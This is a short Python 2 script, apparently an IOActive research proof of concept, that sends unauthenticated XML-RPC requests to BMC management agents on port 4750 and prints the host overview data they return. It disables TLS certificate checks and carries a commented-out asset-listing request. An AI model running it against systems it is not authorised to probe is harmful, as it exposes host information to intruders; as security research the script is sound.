BMC_xmlrpc_client.py

import socket
import struct
import ssl
import StringIO
import gzip

#https://www.troopers.de/media/filer_public/e2/91/e291748f-7b83-48c4-95b7-3d0cdaab6456/one_tool_to_rule_them_all-and_what_can_it_lead_to.pdf

TARGETS = ["192.168.10.31:4750",
           "192.168.10.32:4750"
		   ]

INITIATOR = '<?xml version="1.0" encoding="UTF-8"?>\n'
INITIATOR += '<methodCall>\n'
INITIATOR += '  <methodName>RemoteServer.intro</methodName>\n'
INITIATOR += '    <params>\n'
INITIATOR += '      <param><value>1</value></param>\n'
INITIATOR += '      <param><value>2</value></param>\n'
INITIATOR += '      <param><value>0;0;b;IOActive...;2;CM;-;-;0;-;1;1;b;IOActive...;CP1252;</value></param>\n'
INITIATOR += '      <param><value>8</value></param>\n'
INITIATOR += '    </params>\n'
INITIATOR += '</methodCall>'

GetHostOverview = '<?xml version="1.0" encoding="UTF-8"?>\n'
GetHostOverview += '<methodCall>\n'
GetHostOverview += '  <methodName>RemoteServer.getHostOverview</methodName>\n'
GetHostOverview += '</methodCall>'

#GetUsers = '<?xml version="1.0" encoding="UTF-8"?>'
#GetUsers += '<methodCall><methodName>DAAL.getAssetChildrenStream</methodName>'
#GetUsers += '<params>'
#GetUsers += '<param>'
#GetUsers += '<value>'
#GetUsers += '<struct>'
#GetUsers += '<member><name>typeName</name><value>BMC_Desktop</value></member>'
#GetUsers += '<member><name>host</name><value>0.0.0.0</value></member>'
#GetUsers += '<member>'
#GetUsers += '<name>container</name>'
#GetUsers += '<value><array><data><value><struct>'
#GetUsers += '<member><name>string</name><value>IS_LIVE</value></member>'
#GetUsers += '<member><name>value</name><value><struct><member><name>longValue</name>'
#GetUsers += '<value><ex:i8>1</ex:i8></value></member><member><name>kind</name><value>'
#GetUsers += '<i4>1</i4></value></member></struct></value></member></struct></value>'
#GetUsers += '</data></array></value></member><member><name>path</name>'
#GetUsers += '<value>/</value></member></struct></value></param>'
#GetUsers += '<param><value><i4>1</i4></value></param>'
#GetUsers += '<param><value><array><data/></array></value></param>'
#GetUsers += '<param><value><array><data/></array></value></param>'
#GetUsers += '<param><value><array><data/></array></value></param>'
#GetUsers += '</params>'
#GetUsers += '</methodCall>'

def create_request(ip, port, payload):
    req = ''
    req += 'POST /xmlrpc HTTP/1.1\r\n'
    req += 'Host: ' + ip + ':' + port + '\r\n'
    req += 'User-Agent: IOActive\r\n'
    req += 'Content-Type: text/xml\r\n'
    req += 'Content-Length: ' + str(len(payload)) + '\r\n'
    req += '\r\n'
    req += payload
    return req

def send_netsh_data(sock, data):
    data = struct.pack(">I", len(data)) + data
    sock.send(data)

def recv_xmlrpc_data(sock):
    data = sock.recv(0x2000)
    print "- Received data"
    payload = data.split("\r\n\r\n")[1]
    compressedFile = StringIO.StringIO()
    compressedFile.write(payload)
    compressedFile.seek(0)
    decompressedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
    return decompressedFile.read()

def send_xmlrpc(ip, port):
    s = socket.socket()
    s.settimeout(10)
    s.connect((ip, int(port)))
    # Initial packet which will trigger XMLRPC communication
    s.sendall("TLSRPC")
    wrappedSocket = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1, ciphers=None)

    # CONNECT AND PRINT REPLY
    send_netsh_data(wrappedSocket, create_request(ip, port, INITIATOR))
    print "+ Initiator response:"
    print recv_xmlrpc_data(wrappedSocket)
    send_netsh_data(wrappedSocket, create_request(ip, port, GetHostOverview))
    print recv_xmlrpc_data(wrappedSocket)

    # CLOSE SOCKET CONNECTION
    wrappedSocket.close()

def test():
    for ip, port in [_.split(":") for _ in TARGETS]:
        try:
            send_xmlrpc(ip, port)
        except Exception as e:
            print e.message


if __name__ == "__main__":
    test()